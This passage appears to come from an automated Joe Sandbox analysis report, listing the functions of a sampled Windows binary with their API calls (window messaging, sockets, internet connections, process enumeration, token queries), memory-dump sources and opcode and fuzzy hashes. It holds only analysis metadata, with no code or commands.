                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: 4a8dd213bc424d2df0a5b1dfddaaab59f31001cb8d8e728577428186177b569c
                                                  • Instruction ID: 9768036d5d0c84bdd1735dce06aa3226337901390cef1842fe1470f098951359
                                                  • Opcode Fuzzy Hash: 4a8dd213bc424d2df0a5b1dfddaaab59f31001cb8d8e728577428186177b569c
                                                  • Instruction Fuzzy Hash: A3513134A00219EFCF14DF58D884AAE7BB5FF55360F14815DF8659B2A0D771AE41CB90
                                                  Function 00C19A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C19AD2
                                                  • __itow.LIBCMT ref: 00C19B03
                                                    • Part of subcall function 00C19D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C19DBE
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C19B6C
                                                  • __itow.LIBCMT ref: 00C19BC3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  • Opcode ID: 4f71e3057fe189538e69c4cef68a88de64cfd0321338b8fd4ff9ade8840aaae6
                                                  • Instruction ID: 61b152579a3543bea89b82c6ea3bc4f5611e647d440cd8b48dfc9a821d374af9
                                                  • Opcode Fuzzy Hash: 4f71e3057fe189538e69c4cef68a88de64cfd0321338b8fd4ff9ade8840aaae6
                                                  • Instruction Fuzzy Hash: 5741B270A04209ABDF21EF54D855FEE7BF9EF45720F0000A9F915A3291DB709E84DB61
                                                  Function 00C369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00C369D1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C369E1
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C36A45
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36A51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: b264668613c30b87227177ca8942f605d6cff84457a0820d0db96053b666b8d5
                                                  • Instruction ID: cbe1f1b9b336fd58b00ec24541e2549a287e9a11206e053fee8e92a9fc9147dc
                                                  • Opcode Fuzzy Hash: b264668613c30b87227177ca8942f605d6cff84457a0820d0db96053b666b8d5
                                                  • Instruction Fuzzy Hash: 84418275740200AFEB60AF24CC8AF6E77E4AB45B54F04C46CFA69AF2D2DB709D019791
                                                  Function 00C3641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C4F910), ref: 00C364A7
                                                  • _strlen.LIBCMT ref: 00C364D9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 69f6baabd10143da22c4d996121c60aa8616164d02df6a7ab7cdaa0ff01fa1ee
                                                  • Instruction ID: 49a2412cf10ed61415c51887cb60f154d78ab08d8fdac9e0d4f3f376b24bbd32
                                                  • Opcode Fuzzy Hash: 69f6baabd10143da22c4d996121c60aa8616164d02df6a7ab7cdaa0ff01fa1ee
                                                  • Instruction Fuzzy Hash: C441B771900104BFCB14EBA5DC85FBEB7F9AF45310F1481A9F9169B292DB30AE41DB50
                                                  Function 00C2B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C2B89E
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00C2B8C4
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C2B8E9
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C2B915
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: b080e057e04f3dd4868cd2663dcb2e9406bf7d154591c98de5dafe2f88b1e30e
                                                  • Instruction ID: 4f2030bfbe7ba5cfa2a130a777c3d1ab0eb9008429d11595bf8640caa33debfe
                                                  • Opcode Fuzzy Hash: b080e057e04f3dd4868cd2663dcb2e9406bf7d154591c98de5dafe2f88b1e30e
                                                  • Instruction Fuzzy Hash: 86410439A00610DFDB11EF15C588A59BBE1BF4A750F098098EC5AAB762CB30FD42DB91
                                                  Function 00C48851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C488DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: fc2306aaa786a74dd7cf780e0316bf75313c468d1caa842f9408a275ca435ec3
                                                  • Instruction ID: ba373d9c4dbfbe6196113eb21146127afc40be86664d7b3a0ff83d4ced16874c
                                                  • Opcode Fuzzy Hash: fc2306aaa786a74dd7cf780e0316bf75313c468d1caa842f9408a275ca435ec3
                                                  • Instruction Fuzzy Hash: 1E31E434A00508BFEF249B58CC85FBC77B5FB16320F944516FA25E62E1CE71EA889752
                                                  Function 00C4AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00C4AB60
                                                  • GetWindowRect.USER32(?,?), ref: 00C4ABD6
                                                  • PtInRect.USER32(?,?,00C4C014), ref: 00C4ABE6
                                                  • MessageBeep.USER32(00000000), ref: 00C4AC57
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: cd49c6f56f0c2500b2d2ffcf8ab0f9dcc45e42a501b9013b52d4d8dfc7a5070c
                                                  • Instruction ID: 8022f9f8bdaa4d3b1313720333bc5eb9b9f77609b882881217704a12cb017123
                                                  • Opcode Fuzzy Hash: cd49c6f56f0c2500b2d2ffcf8ab0f9dcc45e42a501b9013b52d4d8dfc7a5070c
                                                  • Instruction Fuzzy Hash: 61418B35A80219DFCB51DF58D8C4BAD7BF5FB49310F1884A9E824DF2A1D732A941CB92
                                                  Function 00BF61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF61FB
                                                  • __isleadbyte_l.LIBCMT ref: 00BF6229
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF6257
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF628D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: ad9d196702e1afea173a409e445b9f987f80044734e345d358b7b352ff1717c0
                                                  • Instruction ID: c542bd2f70c0cdbd213ceeb2e739651e407c23768b09b57b0be685ca3049859c
                                                  • Opcode Fuzzy Hash: ad9d196702e1afea173a409e445b9f987f80044734e345d358b7b352ff1717c0
                                                  • Instruction Fuzzy Hash: 0831CD3060024AAFDF218F65CC44BBA7BF9FF42310F1540A8ED24971A1E731E954DB90
                                                  Function 00C44EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00C44F02
                                                    • Part of subcall function 00C23641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C2365B
                                                    • Part of subcall function 00C23641: GetCurrentThreadId.KERNEL32 ref: 00C23662
                                                    • Part of subcall function 00C23641: AttachThreadInput.USER32(00000000,?,00C25005), ref: 00C23669
                                                  • GetCaretPos.USER32(?), ref: 00C44F13
                                                  • ClientToScreen.USER32(00000000,?), ref: 00C44F4E
                                                  • GetForegroundWindow.USER32 ref: 00C44F54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: a22752d2b912e351598b87634120f76a8be5bcd7b534a954eb0b98d3fc78d1b4
                                                  • Instruction ID: 6bbcd0e5791a759e6cf14d06497cedd499ad46630c93eae474f91a5dde3bb4b3
                                                  • Opcode Fuzzy Hash: a22752d2b912e351598b87634120f76a8be5bcd7b534a954eb0b98d3fc78d1b4
                                                  • Instruction Fuzzy Hash: 9C310B72D00108AFDB10EFA5C885EEFB7FDEF99300F1040AAE455E7241DA759E458BA0
                                                  Function 00C23C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C23C7A
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C23C88
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C23CA8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C23D52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 27842416e90f253a2015e5296494c8396e65dc05020df89732767cf564ae1d79
                                                  • Instruction ID: 65c9e0e4817a8d7c10f97b2c514726498c0cf8cf38e52cf37a1d1194ff2ebda8
                                                  • Opcode Fuzzy Hash: 27842416e90f253a2015e5296494c8396e65dc05020df89732767cf564ae1d79
                                                  • Instruction Fuzzy Hash: 4831A2711083459FD310EF60D881FAFBBE8EF99354F50086DF591861A1EB719A4ACB62
                                                  Function 00C4C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetCursorPos.USER32(?), ref: 00C4C4D2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BFB9AB,?,?,?,?,?), ref: 00C4C4E7
                                                  • GetCursorPos.USER32(?), ref: 00C4C534
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BFB9AB,?,?,?), ref: 00C4C56E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 56a8b3d087dc2d5280a7e858616af2b1a660d79f755510d8a34df1e6cba73ecb
                                                  • Instruction ID: 886d1b2ebe50b7e6975e38b0c99c4d6e9b77f060633c537013607f141accd211
                                                  • Opcode Fuzzy Hash: 56a8b3d087dc2d5280a7e858616af2b1a660d79f755510d8a34df1e6cba73ecb
                                                  • Instruction Fuzzy Hash: D2319E35601018AFCB65CF98C898FBE7BB5FB09360F044069F9158B2B1C731AE51EBA4
                                                  Function 00C18656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18121
                                                    • Part of subcall function 00C1810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C1812B
                                                    • Part of subcall function 00C1810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1813A
                                                    • Part of subcall function 00C1810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18141
                                                    • Part of subcall function 00C1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18157
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C186A3
                                                  • _memcmp.LIBCMT ref: 00C186C6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C186FC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C18703
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 08d2cd33cefd052e84475263cd0840bfda79e2682893e337f0261cccfa5e8233
                                                  • Instruction ID: 80e70762f025aa0078674fdd4a3e2f6c9ab0708a3a257b31f4bef6d91f228e43
                                                  • Opcode Fuzzy Hash: 08d2cd33cefd052e84475263cd0840bfda79e2682893e337f0261cccfa5e8233
                                                  • Instruction Fuzzy Hash: FF217A72E04108EFDB10DFA8C959BEEB7B8EF46304F154099F454AB240DB31AE49EB90
                                                  Function 00BE098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00BE09AE
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  • _fprintf.LIBCMT ref: 00BE09E5
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C15DBB
                                                    • Part of subcall function 00BE4AAA: _flsall.LIBCMT ref: 00BE4AC3
                                                  • __setmode.LIBCMT ref: 00BE0A1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 3796dd25976de23816072e76a9dbd372d2ba945573d2a4608e094619b91c8a8d
                                                  • Instruction ID: c7f6c9d303bbcd71ed48954a16fe14f2bf3a3d7cca3e71bbd88d29c18fb7bab1
                                                  • Opcode Fuzzy Hash: 3796dd25976de23816072e76a9dbd372d2ba945573d2a4608e094619b91c8a8d
                                                  • Instruction Fuzzy Hash: F6116A315042886FDB04B7B6AC86EFE77E89F86320F1400E9F10557182EF70598653A0
                                                  Function 00C31767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C317A3
                                                    • Part of subcall function 00C3182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C3184C
                                                    • Part of subcall function 00C3182D: InternetCloseHandle.WININET(00000000), ref: 00C318E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
                                                  • Instruction ID: e73ad19d321f055ed60752bc280dc50eca3984adfda7843efc670edc6923c5a9
                                                  • Opcode Fuzzy Hash: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
                                                  • Instruction Fuzzy Hash: 19212335210601BFEB129F60CC00FBBBBA9FF49710F18002EFE1596690DB31D912A7A5
                                                  Function 00C23A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00C4FAC0), ref: 00C23A64
                                                  • GetLastError.KERNEL32 ref: 00C23A73
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C23A82
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C4FAC0), ref: 00C23ADF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: 2002dec12459b9c14cda50d7e33bf6eeddadafa23667500e00c7c150004ade59
                                                  • Instruction ID: e47c87ec036c666676f09dbbc5a9fdf915f32c9f6cb506a9c31a9fa70e929226
                                                  • Opcode Fuzzy Hash: 2002dec12459b9c14cda50d7e33bf6eeddadafa23667500e00c7c150004ade59
                                                  • Instruction Fuzzy Hash: 7621B134108251DF8310DF28D88196B77E4BE5A364F104A7DF4A9C72A1DB35DE46DB52
                                                  Function 00C1DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C1F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?), ref: 00C1F0CB
                                                    • Part of subcall function 00C1F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1F0F1
